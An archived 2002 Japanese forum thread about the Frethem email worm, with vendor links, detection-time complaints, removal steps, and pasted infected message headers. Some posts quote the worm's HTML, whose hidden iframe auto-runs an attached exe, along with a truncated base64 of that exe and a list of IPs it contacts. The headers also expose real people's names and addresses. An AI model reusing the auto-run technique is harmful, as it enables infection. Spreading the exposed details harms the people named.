1read 100read
2012年07月セキュリティ260: 【流行の】Frethem【ヨカーン】 (206) TOP カテ一覧 スレ一覧 2ch元 削除依頼
【永久無料】サイバー・ツリーver.3.0【超最強】 (256)
☆☆トロイの木馬☆☆5台目 (668)
またまたブラクラ踏んでしまいました(TAT) (457)
スパイウェア削除ソフトAd-Aware SE その40 (877)
セキュリティー板 悪質荒らし仮まとめ報告スレ (926)
フリーのアンチウイルスソフト最強決定戦! (832)

【流行の】Frethem【ヨカーン】


1 :02/07/15 〜 最終レス :8)
プレビューしただけで感染するウィルス「Frethem」に注意
〜15日19時現在、未対応のアンチウィルスソフトもあり

http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.htm

2 :
でじこのこべやのtaskbar.exeはウイルスじゃないにょ

3 :
ニュース速報+のスレ
【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.net/test/read.cgi/newsplus/1026721442/l50

4 :
☆ウィルス情報&質問 総合スレッド☆part4の767以後
http://pc.2ch.net/test/read.cgi/sec/1024061532/767-

5 :
>>1
かわいそうな作者タン…
ttp://www.vector.co.jp/soft/win31/util/se018881.html

6 :
うちの会社でも一人に感染し、exeを実行してしまったので、200人以上にばらまかれました。

7 :
全てのWinマシンはIE6にしていたはずだったんだが。

今日になって判明。
気難しい大ボスのマシンがデフォだった。しかもOutlookじゃなくてOE利用。
Nortonの定義ファイルも大昔。

誰だよ、対処しないで放置したの(笑

8 :
IE5.0ってパッチあててももうだめかな?
ギコの口が変になるから未だにバージョンアップしてないのだが・・・

9 :
>>8
スレ違いの話だけど。
IE6突っ込むなら、クリーンインストール後にやった方がいいよ。
何故かしらんけど、IE5.5にパッチとか散々入れた後だと、IE6インスコ直後から落ちまくりだった。

10 :
ちなみに、アドレス一覧から宛先を指定しているようでは無かったです。
ひょっとすると、受信したメールのアドレスに対して全て送信していたかもしれません。

11 :
こんな2ちゃんねらー気取りの厨房が立てたスレッドは嫌だ。

12 :
アドレスを登録していない人にfromが自分のアドレスのメールが行った
人がいたのでそうかも。偽ったかもしらん。

13 :
http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.jpg
Becky!だ

14 :
何て読むのよ? ふりーぜん?

15 :
OEじゃ怖くてスクリーンショットとれなかったんだろ⊂ ´⌒つ゜ー゜)つ

16 :
現地点ではNortonせんせでは亜種が引っかからないyo!

17 :
ついでに、発信元になってしまった社内の方、Windows updateは最新の状況に
なっていました。Nortonのウイルス定義ファイルも最新だったようです。
その社員の方からばら撒かれたメールは、OutlookとOutlook expで添付ファイ
ルがあったり、無かったりの症状でした。
Outlook expを利用している方は、添付ファイルが見えてしまうようなので、と
もかくexeファイルを実行しないようにしてくださいネ。

18 :
>>17
保存しとく?って警告が出るはずなのにな。
そこで思いつかないってのは、困ったさんっすね。

19 :
>>9
アドバイスサンクス
バージョンアップしよ。メーラがHTMLメール比対応のAL-MAILだからあんま気にしてなかったけど。
スレ違いにつきsage
>>14
トレンドマイクロによるとフレゼムKだそうな。

20 :
シマンテック、ニュースすら流してないし・・・

21 :
>20
情報でとるよ

22 :
日本テレコムからウイルス キタ━━━━━━(゚∀゚)━━━━━━!!!!
Return-Path: <*********.ota@japan-telecom.co.jp>
Received: from sh.janog.gr.jp ([210.150.17.51]) by ****************
with ESMTP id <*****************************@sh.janog.gr.jp>;
Mon, 15 Jul 2002 15:**:** +0900
Received: by sh.janog.gr.jp (Postfix)
id 295BF3A618B; Mon, 15 Jul 2002 15:53:19 +0900 (JST)
Delivered-To: janog-outgoing@janog.gr.jp
Received: from Yellow.japan-telecom.co.jp (Yellow.japan-telecom.co.jp [210.146.35.35])
by sh.janog.gr.jp (Postfix) with ESMTP id CAB313A5F6F
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:18 +0900 (JST)
Received: from JTEnglish.japan-telecom.co.jp (localhost [127.0.0.1])
by Yellow.japan-telecom.co.jp (3.7W-Yellow) with ESMTP id g6F6r9409577
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:09 +0900 (JST)
Received: from AFRICA ([172.16.237.23])
by rs41ag02.japan-telecom.co.jp (Lotus Domino Release 5.0.8)
with SMTP id 2002071515523870:991 ;
Mon, 15 Jul 2002 15:52:38 +0900
From: *********.ota@japan-telecom.co.jp
To: janog-outgoing@janog.gr.jp
Subject: Re: Your password!
MIME-Version: 1.0
Date: Mon, 15 Jul 2002 15:52:39 +0900
Message-ID: <OF5C37EE24.9F67D683-ON49256BF7.0025C773@japan-telecom.co.jp>
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
--L1db82sd319dm2ns0f4383dhG
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(Toshinori Ota)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-ID: <W8dqwq8q918213>
Content-Transfer-Encoding: base64
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAvUy/dazJBjmsyQY5rMkGOMhFSjmkyQY4QLk2OYzJBjuguT45/MkGOgy1L
jg4yQY6DLUqOYzJBjmsyQY5jMkGOCS1SjmAyQY5rMkCOATJBjoMtV45lMkGOUmljaGsyQY4AAAAA

23 :
>>22
おぉ?

24 :
脳豚 トロすぎ
さっさと対応せんかい 役立たずめが

25 :
>>22
名前消しもれてますよ。(プ

26 :
>>22
> <b>cancel</b><br><br>
> (Toshinori Ota)</font></BODY></HTML>
> <iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
実名晒してるぞ

27 :
Norton は既に対応しとるよ


28 :
あらららら。。。

29 :
Toshinori Ota は、だれの名前かわからない。
To でも From でもないみたい。
Received: from AFRICA ([172.16.237.23])
の AFRICA って何でしょうか?
私のところには
Received: from AFRICA ([10.40.130.151])
から来ています。

30 :
>>29
トレンドだかシマンテックでそのIPアドレス見たような記憶。
今、何故かどっちとも繋がらないんだけど。

31 :
HELO AFRICAは多分そのウイルスがSMTPに対して吐いてるコマンド。
アドレスは知らんけど、多分そのPCのIPでしょ。

32 :
>>30
おいおい、おまいはプライベートアドレスをしらんのか。
ここ出入り禁止。

33 :
俺、このウィルスばらまいたかも。
From のところ書き換えたりするよ。

34 :
>>27
まだ対応していないよ。
02/07/15予定 (米国時間)

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.k%40mm.html

35 :
>>34
http://securityresponse.symantec.com/avcenter/venc/data/w32.frethem.k@mm.html
には予定、とか書いてないように見えるけど気のせいでしょうか

36 :
そう、Fromを偽造する。
社内から山ほどウイルスが来たと思ったら全部社外のIPからだった。


37 :
>>29
漏れの勘違いでした。

Symantecにて、ver.Jとver.Kがそれぞれ別に掲載されました。
ver.k
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
ver.j
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html

TrendMicroでは、まだ1つしか掲載されてないっす。
まとめて見るURLって、どうやるんでしたっけ?
(概要) http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K
(詳細) http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K&VSect=T

というか。漏れのところに届く、ファイルサイズがもっと小さいのがあるんすけど。

38 :
うちにも職場にもキターよ。
もう大騒ぎ(藁。

39 :
>>32
きゃは!恥かしい限りっす。
一瞬これと勘違いしました。

>ワームはシステム常駐後、以下のサイトにアクセスを試み続けます。これはWeb広告サイトの紹介システムのポイントを稼ぐためと思われます:


40 :
>>35
定義ファイルのリンク先に行ってみた?
まだ 12日付の定義で15日付の定義はでていないよ。

41 :
うちの大学でも大暴れしてた!
60通位来てて、鯖も落ちました

42 :
「ポイント」とやらからの収入を得るのって、誰なのか気になる〜
本名で登録していたなら、笑いっす。

43 :
脳豚 遅い 役立たず

44 :
IFRAME実行系だから、とりあえずIE設定→カスタマイズ→IFRAME実行を無効でOKかな?

45 :
嚢豚 AntiVirus がやっと対応しますた

46 :
家のパソコンにも届きました。
アドレスで会社の人からとわかったんですが、家のPCのアドレスを
教えているのは会社では別の一人だけなんです。
その人に連絡したら自分は感染してないと言いました。

これって、ネットワーク感染ってことですか?
的外れな質問だったら許して下さいね。

47 :
感染すると以下のサイトに接続を繰り返す模様。
ポイント稼ぎ狙いの確信犯だな。
http://12.220.54.29/b.cgi
http://12.224.160.208/b.cgi
http://12.225.239.153/b.cgi
http://12.239.90.200/b.cgi
http://12.249.100.107/b.cgi
http://12.252.211.170/b.cgi
http://128.173.231.167/b.cgi
http://129.120.117.218/b.cgi
http://140.158.208.167/b.cgi
http://143.111.86.30/b.cgi
http://144.132.27.124/b.cgi
http://147.26.215.144/b.cgi
http://150.208.186.200/b.cgi
http://170.11.31.35/b.cgi
http://172.148.216.191/b.cgi
http://172.149.84.171/b.cgi
http://195.13.227.140/b.cgi
http://195.13.227.143/b.cgi
http://195.251.228.133/b.cgi
http://204.57.90.184/b.cgi
http://205.162.24.103/b.cgi
http://207.108.36.78/b.cgi
http://207.171.103.126/b.cgi
http://207.50.54.128/b.cgi
http://208.190.152.25/b.cgi
http://208.28.196.214/b.cgi
http://208.38.78.170/b.cgi
http://209.192.135.22/b.cgi
http://209.34.29.161/b.cgi
http://213.190.55.222/b.cgi
http://217.199.112.38/b.cgi
http://24.138.42.33/b.cgi
http://24.153.41.186/b.cgi
http://24.157.108.78/b.cgi
http://24.159.28.120/b.cgi

48 :
続き
http://24.198.18.192/b.cgi
http://24.24.128.16/b.cgi
http://24.242.106.163/b.cgi
http://24.243.76.55/b.cgi
http://24.25.79.187/b.cgi
http://24.91.146.67/b.cgi
http://24.91.187.71/b.cgi
http://4.47.227.27/b.cgi
http://63.106.67.21/b.cgi
http://63.231.167.66/b.cgi
http://63.71.246.234/b.cgi
http://64.211.174.43/b.cgi
http://64.249.48.181/b.cgi
http://65.25.12.45/b.cgi
http://65.67.205.182/b.cgi
http://66.108.150.226/b.cgi
http://66.189.114.161/b.cgi
http://66.233.33.212/b.cgi
http://66.30.52.166/b.cgi
http://66.31.193.42/b.cgi
http://66.31.93.30/b.cgi
http://66.41.32.83/b.cgi
http://66.68.22.102/b.cgi
http://68.113.156.82/b.cgi
http://68.35.125.130/b.cgi
http://68.42.253.163/b.cgi
http://68.57.88.25/b.cgi
http://68.69.53.36/b.cgi

49 :
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
> この亜種は、
> <a href="mailto:w32.frethem.k@mm.html">W32.Frethem.K@mm</a>として、
> 情報を提供しております。
クリックしたらちょっとビビったよ。

50 :
まだ来ない。これってIEのキャッシュのHTML中のメールアドレスは
漁らないのかな。

51 :
とにかくすごい量ダターヨ。

52 :
うちは3通。
そのうちMLからが2通。ナンダカナ(´Å`)

53 :
しっかし脳豚は使えねーな。
未だに対策無しとは・・・ダメだこりゃ。

54 :
とりあえずIFRAMEを切っとけば問題無しじゃないの?

55 :
■ウィルス対策ベンダー各社Frethem.K対応時刻■

・トレンドマイクロ
  → 15日19時頃?
・ネットワークアソシエイツ
  → 15日19時頃?
・シマンテック
  → 15日23時頃?

各社が15時頃からパターンファイル作成開始したと
すると、シマンテックだけ倍近くかかってるってこと?
シマンテックだめじゃん・・・

56 :
区分 お知らせ 
投稿日付 2002年07月15日(月) 20時55分29秒
投稿者 COOL管理者 メール webmaster@cool.ne.jp
時期・期間 指定無し
該当都市 なし
内容 ご利用いただきありがとう御座います。

recruit@cool.ne.jpよりワーム型ウイルス(Win32.Frethem.k)のメールが送信されている可能性が御座います。

Re: Your password!

上記の件名で送信されているメールに添付されているファイルは実行せず、必ず破棄されるようお願いいたします。
また、感染の疑いがある場合は早急に調査をされるようお願いいたします。
*ウイルスの詳細に関しては以下のURL等をご参照ください。
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp

現在、詳細を調査中ですが、詳しい事が分かり次第追ってご報告させていただきます。


57 :
漏れ、オラクルメーリングリストから貰った(´Д`;)
メールのヘッダって公開していいの?

58 :
公開してヨシ!

59 :
ゼヒミセテクダサイ

60 :
From - Wed Nov 14 22:32:40 2001
X-UIDL: ***********************************
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Apparently-To: ******@******.jp *****************.jp; 15 Jul 2002 19:25:28 +0900 (JST)
Return-Path: <***********@******.oracle.co.jp>
X-Track: 1: 40
Received: from ******.oracle.co.jp (202.***.136.**)
by ****************.jp with SMTP; 15 Jul 2002 19:25:25 +0900 (JST)
Received: from localhost (daemon@localhost)
by *******.oracle.co.jp (**************) with SMTP id *******;
Mon, 15 Jul 2002 19:13:07 +0900 (JST)
Received: by oracle.co.jp (bulk_mailer v1.13); Mon, 15 Jul 2002 19:12:40 +0900
Received: (from majordom@localhost)
by naoko.oracle.co.jp (***********) id *******
for terakoya_tech-going; Mon, 15 Jul 2002 19:12:40 +0900 (JST)
X-Authentication-Warning: *******.oracle.co.jp: majordom set sender to owner-terakoya_tech using -f
Received: from mx.ctc-g.co.jp (ns.ctc-g.co.jp [131.248.**.*])
by *****.oracle.co.jp (*************) with ESMTP id ********
for <**********@*****.oracle.co.jp>; Mon, 15 Jul 2002 19:12:38 +0900 (JST)
From: tsuyoshi.ikeda@*******.**.jp
Received: by mx.ctc-g.co.jp (CTC-GN mail 11/07/98) id *******; Mon, 15 Jul 2002 19:25:08 +0900 (JST)
Received: by mx1.ctc-g.co.jp (CTC-GN mail 04/16/98) id ********; Mon, 15 Jul 2002 16:37:47 +0900
Received: by ctcfe.ctc-g.co.jp (CTC-GN mail 11/12/01) id ********; Mon, 15 Jul 2002 16:38:25 +0900
Date: Mon, 15 Jul 2002 16:38:25 +0900
Message-Id: <200207150738.QAA14242@ctcfe.ctc-g.co.jp>
To: ************@*****.oracle.co.jp
Subject: [terakoya'tech'info:75] Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
Sender: **********@*****.oracle.co.jp
--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(** *)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

61 :
Subject: InterScanメッセージ:受信者へ。ファイルブロックに適合したため処理が実行されました。
Date: Mon, 15 Jul 2002 21:09:10 +0900
From: <Administrator@turbolinux.co.jp>
To: <tl-users@meigetsu.turbolinux.co.jp>
InterScan for Microsoft Exchangeにより添付ファイルがブロックされました。
送信者 = konishi@mail.doshisha.ac.jp
受信者 = tl-users@meigetsu.turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 21:09:10
ファイルブロック時の処理:
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。InterScanにより削除が実行されました。

62 :
Subject: InterScanメッセージ:受信者へ。ウイルスが検出されたか、または添付ファイルブロックの条件に一致しました。
Date: Mon, 15 Jul 2002 20:50:32 +0900
From: System Attendant <POO02-SA@pc-daiwabo.co.jp>
To: "'turbolist-ml@turbolinux.co.jp'" <turbolist-ml@turbolinux.co.jp>
InterScan for Microsoft Exchangeにより、メールに処理が実行されました。詳細は
次の通りです。
送信者 = tachiki@dd.iij4u.or.jp
受信者 = turbolist-ml@turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 20:50:32
検索エンジン/パターン = 6.150-1001/317
ウイルス発見時の処理:
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。
InterScanにより移動が実行されました。 添付ファイルは
D:\Trend\Isme\Alert\decrypt-password3d32b70816c.exe_ に移動されました。
受信者への警告! InterScanによりウイルスが検出されました。

63 :
なんだ、実験講師か。

64 :
Date: Mon, 15 Jul 2002 21:30:07 +0900
From: "奥原 浩" <2000z28@kumagaya-h.ed.jp>
Reply-To: <2000z28@kumagaya-h.ed.jp>
To: <turbolist-ml@turbolinux.co.jp>
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。

--
*******************************************************
熊谷高校 COM事務局 奥原 浩
Kumagaya Boys' Highschool Webmaster Okuhara Hiroshi
Mail: 2000z28@kumagaya-h.ed.jp
HP:http://www.kumagaya-h.ed.jp
*******************************************************
--

アホかっちゅうの、MLに投げるなっちゅうの。

65 :
COM事務局がコレかよ(w

66 :
comかぁ。。。
.netかぁ。。。
MS逝ってよし!

67 :
ようやくノートンとInterscanで検出できるようになった

68 :
Frethem.kのウィルスが来たのですが、
トレンドマイクロのホームページ見たら
「プレビューしただけで感染」と書いてありました。
もちろん何も知らないのでプレビューしたのですが、
そのときにメーラーが「ウィルスと思われるファイルがありますが…」と表示したのですが、
この場合も感染したことになるのでしょうか?
一応ウィルス検索のために
新規フォルダを作ってそこに保存したのですが。
危ないでしょうか?

69 :
あ、ちなみに送られてきたのは
>>56のcoolからです

70 :
>>68
対処方法
Windowsフォルダーにコピーされた taskbar.exe を削除する。
参考手順:
1.インターネット接続を遮断する。
(クライアント PC に接続されているイーサネットケーブルや無線 LAN カードを物理的に抜くのが確実で す。)
これによって、ウイルス が動作した場合にも、メール送信による感染拡大を防ぎます。
2.添付ファイルをもった該当メールのメッセージを削除する。
3.Control キー、Alt キー、Delete キーを同時に押下し、プログラム一覧から taskbar を選択し、強制終了する。
4.「スタート」「検索」から、taskbar.exe を探し、削除する。
5.再起動する。
http://www.ipa.go.jp/security/topics/newvirus/frethem.html

71 :
>>70
taskbar.exeが見当たらないってことは
感染してないってことでしょうか?

72 :
>>71
そうです。文章をよく読みましょう。ハアト。

73 :
Subject: そちらからウィルスが送られてきました
Date: Mon, 15 Jul 2002 22:02:23 +0900
From: "Yukihiro Yonehara" <acalanata@mm.neweb.ne.jp>
To: <turbolist-ml@turbolinux.co.jp>
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。
至急、対応願います。
米原 幸宏


やかましいんじゃボゲッ!!
なにが至急、対応願いますだアホ

74 :
シャープから来ますた。
Received: from rcpt-impgw.biglobe.ne.jp by biglobe.ne.jp (RCPT_GW)
id TAA10966; Mon, 15 Jul 2002 19:15:18 +0900 (JST)
Received: from tg4.sharp.co.jp (tg4.sharp.co.jp [211.4.241.22])
by rcpt-impgw.biglobe.ne.jp (mnmy/3916220502) with ESMTP id g6FAFGc10946
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:17 +0900 (JST)
Received: from tg.sharp.co.jp (unknown [10.65.37.38])
by tg4.sharp.co.jp (Postfix) with ESMTP id 8CB193C243
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:16 +0900 (JST)
Received: from ws2-tnr.sharp.co.jp (unknown [10.65.37.40])
by tg.sharp.co.jp (Postfix) with SMTP id 2B92511568A
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:15 +0900 (JST)
Received: FROM mail.sharp.co.jp BY ws2-tnr.sharp.co.jp ; Mon Jul 15 19:14:45 2002 +0900
Received: from AFRICA by mail.sharp.co.jp (8.10.2/1.1.2.11/09Feb01-0154PM)
id g6FAEjw0002344278; Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Date: Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Message-Id: <200207151014.g6FAEjw0002344278@mail.sharp.co.jp>
From: audio_support@sharp.co.jp
To: xxx@xxx.biglobe.ne.jp
Subject: Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
X-UIDL: 799792848084825F976256025F999313405F255

75 :
レジストリに
taskbar display "RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY"

てあるんですけど これですか? これを削除すれば いいんですか?
初めてのことなんで。。。


76 :
>>75
それは違う、解像度変更のタスクバーアイコンのやつだろ

77 :
>>76
そうだったんですか・・ありがとうございます。
パッチ当ててないIEとOE使ってるヘタレなもんで。。
ウィルスメール受け取ったの今回が初めてなもんで(汗
まあ 明らかに怪しいメールだったんで プレビューで表示されたけど 添付ファイルだけは開けないでそのまま削除しといたんです。

78 :
>>77
というかなんでパッチ当てないのかききたい。
へたれとか言ってる暇があったら当てれ。

79 :
大学のサーバーが落ちますた

80 :
>>64
こいつうちにもきたぞ何者だ?

81 :
>>80
MLのROMで
MLへのポスト/リプライの仕方知らない人

82 :
Subject: メーリングリスト停止のお願い
Date: Tue, 16 Jul 2002 00:42:37 +0900
From: 石川初男 <ishikawa@tmc-ipd.ac.jp>
To: turbolist-ml@turbolinux.co.jp
管理者殿
 ウィルスの発信元が貴殿のメーリングリストからのものになっています。
早急に停止を。

Subject: test
Date: Tue, 16 Jul 2002 00:52:00 +0900
From: 宮本 明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@turbolinux.co.jp>

Subject: test
Date: Tue, 16 Jul 2002 00:52:37 +0900
From: 宮本 明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@meigetsu.turbolinux.co.jp>

アホかっちゅうの

83 :
このウィルスは送信者偽装するの?

84 :
うざ
http://www.turbolinux.co.jp/dcforum/DCForumID11/4068.html

85 :
感染してしまった人は以下を参照
手動削除手順:
1)不正プログラムの自動起動設定を削除します。
Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリの値を削除してください。
場所: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
値 : "Task Bar"="<Windowsディレクトリ>\taskbar.exe"
トレンドマイクロからコピペ
そしてwindowsディレクトリのtaskbar.exeを削除するのだ

86 :
感染後の処置方法等は各ベンダーのサイトでご確認ください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp
http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Frethem.l@MM
http://www.nai.com/japan/virusinfo/infoFrethem.asp

87 :
「メールにウィルスがおったぞゴルァ」って本文のFrom:に
投げるのはやめれ>某組織
投げんならちゃんとenvelope fromに返せっつーの
ここは <> なメールも受け取らんし何考えてんだ

88 :
うちにも2通来たけど、どっちも添付ファイルがなかった。
これは安全なのか?

89 :
>>87
何も考えてない。

90 :
題名に「ウィルス」と入れて欲しかった

91 :
うちのは taskbar.exe を削除したのに、まだウイルスばら撒いてる。
なんで?

92 :
>>91 「WORM_FRETHEM.K」駆除ツール使え↓
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=4305
駆除後はアンチウィルスソフト常駐させよ。

93 :
>>87
KLEZ で詐称された From のアドレス宛に、ウィルス警告メールを送ってくる
対策ソフトもうざい。

94 :
>>93 何のソフト?

95 :
やーねぇ。
昨日夕刻にきたわよ。
その場でノートンの更新をしたけど駄目だったのよ。
アドレス帳が”送ってはいけない人たち”リストになってたのよ。
今日は朝から脅しメールや電話が来まくるのよやーねぇ。

96 :
ちなみにあたしんちは三菱から来たわよ
97 :あぼーん:あぼーん
あぼーん

98 :
>>93
InterScanだとenvelope-fromに送るみたいだけど。

99 :
中京テレビのディズニーオンアイス事務局やられてねーか?
ディズニーオンアイス事務局あてのウイルス警告メールが
うちにがんがん流れてくるんだけど。なんで?
ちなみに本体は来てません。

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
何故ウイルスバスターは馬鹿にされるのか (525)
【無料】 PC-Clean 【スパイウェア駆除】 PART 2 (567)
FortiClient (283)
[Firewall ] PCGATE [もってる香具師集合] (332)
無償オンラインスキャンpart3【ウイルス撲滅】 (565)
CATV JCOMのIPアドレス (373)
--log9.info------------------
横山光輝の漫画読んでみたけどこいつ才能ないな (284)
織田ビリーブ長 (319)
【貧R党】Wなんとか親衛隊スレ通算10【女帝】 (745)
思いついた一発ネタを書き込むスレ (521)
趙雲最強説 (793)
人には言えない三国志の勘違い (777)
三戦住人で「のぶニャがの野望」やろうぜ!!! (344)
【●】三国志のちょっとしたトリビア【●】 (371)
明智光秀は本当に有能だったのか?? (686)
【曹洪の】三国志漫画劉備くん【三国志】 (290)
曹操なんてティムールと戦ったら手も足も出ず瞬殺されてしまう (410)
戦国最強は誰だ!信長・信玄・謙信・元就… (325)
真・三國無双2に想いを馳せるスレ【懐古】 (483)
三国志・戦国板の住民にありがちなこと (436)
読めなかった武将 (214)
劉備が劉璋を裏切って蜀を奪った件について (713)
--log55.com------------------
ライザのアトリエ 〜常闇の女王と秘密の隠れ家〜 Part44
【PS4/Switch】ペルソナ5 スクランブル ザ ファントム ストライカーズ Part3【P5S】
アーシャ/エスカ&ロジー/シャリーのアトリエ 黄昏総合 Part140
【PS4】Fallout4 フォールアウト4 Vault281【FO4】
【PS3/PS4】テイルズオブゼスティリア【TOZ】part839 ワッチョイなし
【総合】CODE VEIN コードヴェイン Part69
【PS4】Bloodborne ブラッドボーン part1051
【Switch】幻影異聞録♯FE part60【WiiU】